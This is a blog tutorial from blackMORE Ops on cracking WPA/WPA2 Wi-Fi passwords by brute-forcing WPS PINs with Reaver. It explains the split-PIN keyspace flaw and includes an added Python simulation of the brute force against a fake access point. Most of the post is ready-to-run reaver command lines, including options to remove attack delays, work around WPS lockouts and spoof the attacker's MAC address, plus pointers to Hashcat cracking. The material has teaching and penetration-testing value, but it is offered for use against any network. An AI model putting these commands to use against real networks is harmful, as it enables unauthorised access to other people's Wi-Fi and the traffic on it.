Cracking Wifi WPA/WPA2 passwords using Reaver WPS

This entry was posted in Cracking, Hacking, Linux, Reaver, Wifi, Wireless and tagged Cracking, Reaver, WPS, Wifi, WPA2 on October 12, 2013 by blackMORE Ops.
reaver-wps

Brute force attack against Wifi Protected Setup: Cracking Wifi WPA/WPA2 passwords using Reaver WPS
Source: http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/ (retrieved 22/12/2014)
Overview:

Reaver-wps performs a brute force attack against an access point's Wi-Fi Protected Setup PIN. Once the WPS PIN is found, the WPA PSK can be recovered and, alternatively, the AP's wireless settings can be reconfigured. This post outlines the steps and commands for cracking Wifi WPA/WPA2 passwords using Reaver WPS.

While Reaver-wps itself does not support reconfiguring the AP, this can be accomplished with wpa_supplicant once the WPS PIN is known.

Readers, note that I've since written another post where I could crack a password in 14.21 seconds using a pyrit, cowpatty and WiFite combination attack with a dictionary. The whole process takes less than 10 minutes.

Those who would like to try more ways of cracking Wifi WPA/WPA2 passwords can also use Hashcat, cudaHashcat or oclHashcat to crack unknown Wifi WPA/WPA2 passwords. The benefit of using Hashcat is that you can create your own rule to match a pattern and run a brute force attack. This is an alternative to a dictionary attack: a dictionary can only contain a certain number of words, whereas a brute force attack lets you test every possible combination of a given charset. Hashcat can crack Wifi WPA/WPA2 passwords, and you can also use it to crack MD5, phpBB, MySQL and SHA1 hashes. Hashcat is a good option because if you can guess one or two characters of a password, cracking it takes only a few minutes. For example, if you know 3 characters of a password, it takes about 12 minutes to crack; if you know 4 characters, about 3 minutes (figures from the author's own setup; they depend on password length and GPU). You can also write rules that try only letters and numbers to crack a completely unknown password if you know that a certain router's default password contains only those, which raises the odds of cracking it considerably.
Important Note: Many users try to capture with network cards that are not supported. You should purchase a card that supports Kali Linux, including injection and monitor mode. A list can be found in 802.11 Recommended USB Wireless Cards for Kali Linux. It is very important that you have a supported card; otherwise you will just be wasting time and effort on something that won't do the job.
Contents

reaver-wps: Brute force attack against Wifi Protected Setup, Cracking Wifi WPA/WPA2 passwords using Reaver WPS
Overview
Description
Installation
Usage
More on Basic Usages
Speeding Up the Attack
MAC Spoofing
Supported Wireless Drivers
Partially Supported
Not Supported
Conclusion
Related
Description:

Reaver-wps targets the external registrar functionality mandated by the Wi-Fi Protected Setup specification. Access points will provide authenticated registrars with their current wireless configuration (including the WPA PSK), and will also accept a new configuration from the registrar.

In order to authenticate as a registrar, the registrar must prove its knowledge of the AP's 8-digit PIN. Registrars may authenticate themselves to an AP at any time without any user interaction. Because the WPS protocol is conducted over EAP, the registrar need only be associated with the AP and does not need any prior knowledge of the wireless encryption or configuration.

Reaver-wps performs a brute force attack against the AP, attempting every possible combination in order to guess the AP's 8-digit PIN. Since the PINs are all numeric, there are 10^8 (100,000,000) possible values for any given PIN. However, because the last digit of the PIN is a checksum value which can be calculated from the previous 7 digits, the keyspace is reduced to 10^7 (10,000,000) possible values.

The keyspace is reduced even further by the fact that the WPS authentication protocol cuts the PIN in half and validates each half independently. That means there are 10^4 (10,000) possible values for the first half of the PIN and 10^3 (1,000) possible values for the second half, with the last digit of the PIN being a checksum.

Reaver-wps brute forces the first half of the PIN and then the second half, meaning that the entire keyspace for the WPS PIN can be exhausted in at most 11,000 attempts. The speed at which Reaver can test PINs is entirely limited by the speed at which the AP can process WPS requests. Some APs are fast enough that one PIN can be tested every second; others are slower and only allow one PIN every ten seconds. Statistically, it will only take half of that time on average to guess the correct PIN.
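The keyspace argument above, worked through in code. This is an added example, not code from the blackMORE Ops post or from the Reaver project: it implements the PIN checksum defined by the Wi-Fi Protected Setup specification, and simulates the split first-half/second-half validation that lets the full space be exhausted in at most 11,000 attempts. FakeAccessPoint is a constructed oracle standing in for a real AP's NACK/OK responses to M4 and M6; the PIN 12345670 is the spec's own sample PIN.

```python
"""WPS PIN checksum and the 11,000-attempt keyspace, as a runnable model."""

from typing import Dict, Tuple


def wps_checksum(pin7: int) -> int:
    """Return the 8th (checksum) digit for the 7-digit PIN body `pin7`.

    WPS weights the seven digits 3,1,3,1,3,1,3 and picks the digit that
    brings the weighted sum to a multiple of 10.
    """
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)   # odd positions, counted from the right
        pin7 //= 10
        accum += pin7 % 10         # even positions
        pin7 //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if `pin` is 8 digits and its last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def keyspace() -> Dict[str, int]:
    """The three keyspace sizes the Description walks through."""
    return {
        "naive_8_digits": 10 ** 8,           # every digit free
        "checksum_fixed": 10 ** 7,           # 8th digit derived from the first 7
        "split_halves": 10 ** 4 + 10 ** 3,   # halves validated independently
    }


class FakeAccessPoint:
    """Constructed WPS oracle (not a real AP): judges the two PIN halves
    separately, as the protocol does after M4 and M6."""

    def __init__(self, pin: str) -> None:
        if not is_valid_pin(pin):
            raise ValueError("AP PIN must carry a valid checksum")
        self._first, self._second = pin[:4], pin[4:]
        self.requests = 0

    def try_pin(self, pin: str) -> str:
        """Return 'NACK-M4', 'NACK-M6' or 'OK' for one registrar attempt."""
        self.requests += 1
        if pin[:4] != self._first:
            return "NACK-M4"          # first half wrong: AP NACKs after M4
        if pin[4:] != self._second:
            return "NACK-M6"          # first half right, second half wrong
        return "OK"


def brute_force(ap: FakeAccessPoint) -> Tuple[str, int]:
    """Recover the PIN the way Reaver does: first half, then second half.

    Returns (pin, requests_sent). Worst case is 10,000 + 1,000 requests.
    """
    first = None
    for i in range(10_000):
        cand = f"{i:04d}"
        # Any checksum-valid completion will do; only the first half is judged here.
        probe = cand + "000" + str(wps_checksum(int(cand + "000")))
        if ap.try_pin(probe) != "NACK-M4":
            first = cand
            break
    if first is None:
        raise RuntimeError("AP never accepted a first half")

    for j in range(1_000):
        body = first + f"{j:03d}"
        pin = body + str(wps_checksum(int(body)))
        if ap.try_pin(pin) == "OK":
            return pin, ap.requests
    raise RuntimeError("second half not found")


if __name__ == "__main__":
    print(keyspace())
    print(brute_force(FakeAccessPoint("12345670")))   # ('12345670', 1803)
```

The simulated AP answers instantly, so the 1,803 requests for the sample PIN complete in milliseconds; against a real AP each request is one WPS exchange, which is why the post's one-to-ten-seconds-per-PIN figure, and not the keyspace, dominates the attack time.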
Installation:

Install Kali Linux; everything is built into it (Reaver-wps, libpcap and libsqlite3).
Usage:

Usually, the only required arguments to Reaver-wps are the interface name and the BSSID of the target AP:

# reaver -i mon0 -b 00:01:02:03:04:05

The channel and SSID (provided that the SSID is not cloaked) of the target AP will be automatically identified by Reaver-wps, unless explicitly specified on the command line:

# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys

By default, if the AP switches channels, Reaver-wps will also change its channel accordingly. However, this feature may be disabled by fixing the interface's channel:

# reaver -i mon0 -b 00:01:02:03:04:05 --fixed

The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (the minimum timeout period is 1 second):

# reaver -i mon0 -b 00:01:02:03:04:05 -t 2

The default delay period between PIN attempts is 1 second. This value can be increased or decreased to any non-negative integer value. A value of zero means no delay:

# reaver -i mon0 -b 00:01:02:03:04:05 -d 0

Some APs will temporarily lock their WPS state, typically for five minutes or less, when suspicious activity is detected. By default, when a locked state is detected, Reaver-wps will check the state every 315 seconds (5 minutes and 15 seconds) and will not continue brute forcing PINs until the WPS state is unlocked. This check interval can be increased or decreased to any non-negative integer value:

# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250

For additional output, the verbose option may be provided. Providing the verbose option twice will increase verbosity and display each PIN as it is attempted:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv

The default timeout period for receiving the M5 and M7 WPS response messages is 0.1 seconds. This timeout period can be set manually if necessary (the maximum timeout period is 1 second):

# reaver -i mon0 -b 00:01:02:03:04:05 -T .5

Some poor WPS implementations will drop a connection on the floor when an invalid PIN is supplied instead of responding with a NACK message as the spec dictates. To account for this, if an M5/M7 timeout is reached it is treated the same as a NACK by default. However, if it is known that the target AP sends NACKs (most do), this feature can be disabled to ensure better reliability. This option is largely unnecessary, as Reaver-wps will auto-detect whether an AP properly responds with NACKs or not:

# reaver -i mon0 -b 00:01:02:03:04:05 --nack

While most APs don't care, sending an EAP FAIL message to close out a WPS session is sometimes necessary. By default this feature is disabled, but it can be enabled for those APs that need it:

# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate

When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this may be a sign that the AP is rate limiting PIN attempts or is simply overloaded, a sleep can be put in place that will occur whenever these warning messages appear:

# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

More on Basic Usages

First, make sure your wireless card is in monitor mode:

# airmon-ng start wlan0

To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually mon0, not wlan0, although this will vary based on your wireless card and drivers):

# reaver -i mon0 -b 00:01:02:03:04:05

You will probably also want to use -vv to get verbose info about Reaver's progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack

By default, Reaver-wps has a 1 second delay between PIN attempts. You can disable this delay by adding -d 0 on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small Diffie-Hellman secret numbers in order to reduce the computational load on the target AP:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
MAC Spoofing

In some cases you may want or need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.

Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface, and only then create the monitor interface from it. For example:

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

Supported Wireless Drivers

The following wireless drivers have been tested or reported to work successfully with Reaver-wps:

ath9k
rtl8187
carl9170
ipw2000
rt2800pci
rt73usb

Partially Supported

The following wireless drivers have had mixed success, and may or may not work depending on your wireless card (i.e., if you are having problems with these drivers/cards, consider trying a new card before submitting a trouble ticket):

ath5k
iwlagn
rt2800usb (using the latest compat-wireless drivers has fixed many users' problems, hint hint...)
b43

Not Supported

The following wireless drivers/cards have been tested or reported to not work properly with Reaver:

iwl4965
RT3070L
Netgear WG111v3
Conclusion

If you want to pentest or hack your Wifi passwords, the first thing you need is a compatible Wifi card. Most Wifi cards are priced between $15 and $35 USD. I see no point struggling with an unsupported card when you can invest those extra bucks in a card that will last you years. You get to learn how to pentest or hack Wifi passwords, how to inject, spoof, and set up a fake AP or honeypot. See the list of supported USB Wifi adapter cards that work in Kali Linux and are available on Amazon.

Related post: Speed up WPA/WPA2 cracking with Pyrit and CUDA and leveraging Wifite [This post is now replaced and updated by the next one below]
Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux